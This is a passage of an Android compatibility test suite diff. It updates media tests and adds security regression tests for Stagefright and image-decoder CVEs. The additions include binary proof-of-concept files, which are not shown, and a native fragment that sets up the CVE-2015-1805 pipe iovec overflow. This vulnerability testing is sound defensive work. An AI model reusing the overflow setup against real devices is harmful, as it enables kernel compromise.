- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
@@ -227,8 +191,7 @@
private void validateResult(
VideoFormat videoFormat, VideoViewSnapshot videoViewSnapshot, int goldenResId) {
- final Bitmap result = checkNotNull("The expected bitmap from snapshot is null",
- getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot));
+ final Bitmap result = getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot);
final Bitmap golden = getHelper().generateBitmapFromImageResourceId(goldenResId);
final BitmapCompare.Difference difference = BitmapCompare.computeMinimumDifference(
result, golden, videoFormat.getOriginalWidth(), videoFormat.getOriginalHeight());
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
index 1ce732d..fae1bb4 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
@@ -44,8 +44,6 @@
import android.os.HandlerThread;
import android.os.Looper;
import android.os.SystemClock;
-import android.support.test.InstrumentationRegistry;
-import android.support.test.runner.AndroidJUnit4;
import android.test.ActivityInstrumentationTestCase2;
import android.util.Log;
import android.util.Pair;
@@ -75,12 +73,7 @@
import javax.microedition.khronos.egl.EGLDisplay;
import javax.microedition.khronos.egl.EGLSurface;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.runner.RunWith;
-
@TargetApi(16)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTestBase
extends ActivityInstrumentationTestCase2<DecodeAccuracyTestActivity> {
@@ -93,12 +86,9 @@
super(DecodeAccuracyTestActivity.class);
}
- @Before
@Override
- public void setUp() throws Exception {
+ protected void setUp() throws Exception {
super.setUp();
- injectInstrumentation(InstrumentationRegistry.getInstrumentation());
- setActivityInitialTouchMode(false);
mActivity = getActivity();
getInstrumentation().waitForIdleSync();
mContext = getInstrumentation().getTargetContext();
@@ -106,9 +96,8 @@
testHelper = new TestHelper(mContext, mActivity);
}
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
mActivity = null;
super.tearDown();
}
@@ -128,11 +117,6 @@
return reference;
}
- public static <T> T checkNotNull(String msg, T reference) {
- assertNotNull(msg, reference);
- return reference;
- }
-
public static class SimplePlayer {
public static final long DECODE_TIMEOUT_MS = TimeUnit.SECONDS.toMillis(1) / 2;
@@ -435,8 +419,6 @@
/* Utility class for collecting common test case functionality. */
class TestHelper {
- private final String TAG = TestHelper.class.getSimpleName();
-
private final Context context;
private final Handler handler;
private final Activity activity;
@@ -491,21 +473,13 @@
}
public synchronized Bitmap generateBitmapFromVideoViewSnapshot(VideoViewSnapshot snapshot) {
- final long timeOutMs = TimeUnit.SECONDS.toMillis(10);
- final long start = SystemClock.elapsedRealtime();
handler.post(snapshot);
try {
- while (!snapshot.isBitmapReady()
- && (SystemClock.elapsedRealtime() - start < timeOutMs)) {
+ while (!snapshot.isBitmapReady()) {
Thread.sleep(100);
}
} catch (InterruptedException e) {
e.printStackTrace();
- return null;
- }
- if (!snapshot.isBitmapReady()) {
- Log.e(TAG, "Time out in generateBitmapFromVideoViewSnapshot().");
- return null;
}
return snapshot.getBitmap();
}
@@ -1191,7 +1165,8 @@
class SurfaceViewSnapshot extends VideoViewSnapshot {
private static final String TAG = SurfaceViewSnapshot.class.getSimpleName();
- private static final int PIXELCOPY_REQUEST_SLEEP_MS = 100;
+ private static final int PIXELCOPY_REQUEST_SLEEP_MS = 30;
+ private static final int PIXELCOPY_REQUEST_MAX_ATTEMPTS = 20;
private static final int PIXELCOPY_TIMEOUT_MS = 1000;
private final Thread copyThread;
@@ -1207,13 +1182,15 @@
bitmap = Bitmap.createBitmap(width, height, Config.ARGB_8888);
try {
// Wait for SurfaceView to be available.
- while (copyResult != PixelCopy.SUCCESS) {
- Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
+ for (int i = 0; i < PIXELCOPY_REQUEST_MAX_ATTEMPTS; i++) {
copyResult = copyHelper.request(surfaceView, bitmap);
+ if (copyResult == PixelCopy.SUCCESS) {
+ break;
+ }
+ Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
}
} catch (InterruptedException e) {
- Log.e(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
- bitmap = null;
+ Log.w(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
}
copyHelper.release();
}
@@ -1317,10 +1294,10 @@
try {
waitForByteBuffer();
} catch (InterruptedException e) {
- Log.e(TAG, e.getMessage());
- bitmap = null;
- return;
+ Log.w(TAG, e.getMessage());
+ Log.w(TAG, "ByteBuffer may contain incorrect pixels.");
}
+ // Get ByteBuffer anyway. Let the test fail if ByteBuffer contains incorrect pixels.
ByteBuffer byteBuffer = glSurfaceViewFactory.getByteBuffer();
bitmap = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);
byteBuffer.rewind();
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 32d9eaa..dffb653 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,17 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone()) {
+ return; // skip
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index f7cbcc4..c5baeed 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
private static final int SECURITY_PATCH_YEAR = 2017;
- private static final int SECURITY_PATCH_MONTH = 03;
+ private static final int SECURITY_PATCH_MONTH = 05;
private boolean mSkipTests = false;
diff --git a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
index 25dcc9b..12c3517 100644
--- a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
+++ b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
@@ -303,14 +303,18 @@
* set up to overflow iov[OVERFLOW_BUF] on non-atomic redo in kernel
* function pipe_iov_copy_to_user
*/
- bufs[OVERFLOW_BUF] = mmap((void*)(FIXED_ADDR), PAGE_SIZE, PROT_READ | PROT_WRITE,
- MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ iovs[OVERFLOW_BUF - 1].iov_len = IOV_LEN*10;
+ iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
+ iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
+
+ overflow_addr = mmap((void *) FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+ bufs[OVERFLOW_BUF] = overflow_addr;
if (bufs[OVERFLOW_BUF] == MAP_FAILED) {
ALOGE("mmap fixed addr failed:%s", strerror(errno));
goto __close_pipe;
}
- iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
- iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
for (i = 0; i < BUFS; i++) {
if (i == OVERFLOW_BUF) {
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_34778578.bmp b/tests/tests/security/res/raw/bug_34778578.bmp
new file mode 100644
index 0000000..4a08a61
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_34778578.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35467107.mp4 b/tests/tests/security/res/raw/bug_35467107.mp4
new file mode 100644
index 0000000..43ccef6
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35467107.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35763994.amr b/tests/tests/security/res/raw/bug_35763994.amr
new file mode 100644
index 0000000..b6d3f0e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35763994.amr
@@ -0,0 +1 @@
+#!AMR-WB
diff --git a/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4 b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
new file mode 100644
index 0000000..6d41ebc
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3755.mp4 b/tests/tests/security/res/raw/cve_2016_3755.mp4
new file mode 100644
index 0000000..014bd06
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3755.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4 b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
new file mode 100644
index 0000000..469a1b3
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/DecodeTest.java b/tests/tests/security/src/android/security/cts/DecodeTest.java
new file mode 100644
index 0000000..e64e37a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/DecodeTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class DecodeTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a large, corrupt BMP.
+ *
+ * Prior to fixing bug 34778578, decoding this file would crash. Instead, it should fail to
+ * decode.
+ */
+ @SecurityTest
+ public void test_android_bug_34778578() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_34778578);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 1c5fdb7..c481549 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2015 The Android Open Source Project
+ * Copyright (C) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -39,12 +39,16 @@
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
+import android.webkit.cts.CtsTestServer;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
+import java.util.HashMap;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -68,142 +72,229 @@
before any existing test methods
***********************************************************/
+ public void testStagefright_bug_35763994() throws Exception {
+ doStagefrightTest(R.raw.bug_35763994);
+ }
+
+ @SecurityTest
public void testStagefright_bug_33137046() throws Exception {
doStagefrightTest(R.raw.bug_33137046);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
+ @SecurityTest
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- public void testStagefright_bug_32873375() throws Exception {
- doStagefrightTest(R.raw.bug_32873375);
- }
-
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- public void testStagefright_bug_14388161() throws Exception {
+ @SecurityTest
+ public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_3755() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3755);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
+ doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
+ }
+
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
- public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
- doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ /***********************************************************
+ to prevent merge conflicts, add N tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_35467107() throws Exception {
+ doStagefrightTest(R.raw.bug_35467107);
}
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
doStagefrightTestMediaMetadataRetriever(rid);
+
+ Context context = getInstrumentation().getContext();
+ Resources resources = context.getResources();
+ CtsTestServer server = new CtsTestServer(context);
+ String rname = resources.getResourceEntryName(rid);
+ String url = server.getAssetUrl("raw/" + rname);
+ doStagefrightTestMediaPlayer(url);
+ doStagefrightTestMediaCodec(url);
+ doStagefrightTestMediaMetadataRetriever(url);
+ server.shutdown();
}
private Surface getDummySurface() {
@@ -303,13 +394,32 @@
}
private void doStagefrightTestMediaPlayer(final int rid) throws Exception {
+ doStagefrightTestMediaPlayer(rid, null);
+ }
- String name = getInstrumentation().getContext().getResources().getResourceEntryName(rid);
+ private void doStagefrightTestMediaPlayer(final String url) throws Exception {
+ doStagefrightTestMediaPlayer(-1, url);
+ }
+
+ private void closeQuietly(AutoCloseable closeable) {
+ if (closeable != null) {
+ try {
+ closeable.close();
+ } catch (RuntimeException rethrown) {
+ throw rethrown;
+ } catch (Exception ignored) {
+ }
+ }
+ }
+
+ private void doStagefrightTestMediaPlayer(final int rid, final String uri) throws Exception {
+
+ String name = uri != null ? uri :
+ getInstrumentation().getContext().getResources().getResourceEntryName(rid);
Log.i(TAG, "start mediaplayer test for: " + name);
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
@@ -320,16 +430,23 @@
mp.setOnCompletionListener(mpcl);
Surface surface = getDummySurface();
mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
try {
- AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
- .openRawResourceFd(rid);
+ if (uri == null) {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(rid);
- mp.setDataSource(fd.getFileDescriptor(),
- fd.getStartOffset(),
- fd.getLength());
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } else {
+ mp.setDataSource(uri);
+ }
mp.prepareAsync();
} catch (Exception e) {
+ } finally {
+ closeQuietly(fd);
}
Looper.loop();
@@ -346,6 +463,14 @@
}
private void doStagefrightTestMediaCodec(final int rid) throws Exception {
+ doStagefrightTestMediaCodec(rid, null);
+ }
+
+ private void doStagefrightTestMediaCodec(final String url) throws Exception {
+ doStagefrightTestMediaCodec(-1, url);
+ }
+
+ private void doStagefrightTestMediaCodec(final int rid, final String url) throws Exception {
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
@@ -364,6 +489,7 @@
mp.setDataSource(fd.getFileDescriptor(),
fd.getStartOffset(),
fd.getLength());
+ fd.close();
} catch (Exception e) {
// this is a known-good file, so no failure should occur
fail("setDataSource of known-good file failed");
@@ -383,16 +509,21 @@
}
Resources resources = getInstrumentation().getContext().getResources();
- AssetFileDescriptor fd = resources.openRawResourceFd(rid);
MediaExtractor ex = new MediaExtractor();
- try {
- ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
- } catch (IOException e) {
- // ignore
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ ex.setDataSource(url);
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
- String rname = resources.getResourceEntryName(rid);
+ String rname = url != null ? url: resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
for (int t = 0; t < numtracks; t++) {
// find all the available decoders for this format
@@ -405,13 +536,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
@@ -432,16 +565,22 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
+ ex.getCachedDuration();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
